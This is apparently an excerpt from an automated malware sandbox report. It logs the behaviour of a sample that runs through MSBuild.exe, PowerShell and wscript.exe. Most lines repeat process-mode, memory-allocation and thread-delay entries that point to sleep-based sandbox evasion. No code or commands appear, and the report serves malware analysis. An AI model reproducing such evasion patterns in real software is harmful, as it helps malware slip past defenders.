                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598872Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598317Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596116Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595983Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595732Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595183Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594530Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594087Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593869Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593733Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592776Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592106Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591889Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 591562Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4147Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4821Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4988Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536Thread sleep count: 4821 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -599421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536Thread sleep count: 4988 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -599312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -599093s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598872s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598317s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597760s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597314s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -597199s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -596116s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595983s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595732s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595406s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595296s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595183s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -595077s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594968s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594856s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594747s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594530s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -594087s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -593869s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -593733s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -593531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -592776s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -592454s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -592328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -592218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -592106s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -591999s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -591889s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -591777s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -591671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7528Thread sleep time: -591562s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598872Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598317Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597314Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597199Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596116Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595983Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595732Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595515Jump to behavior
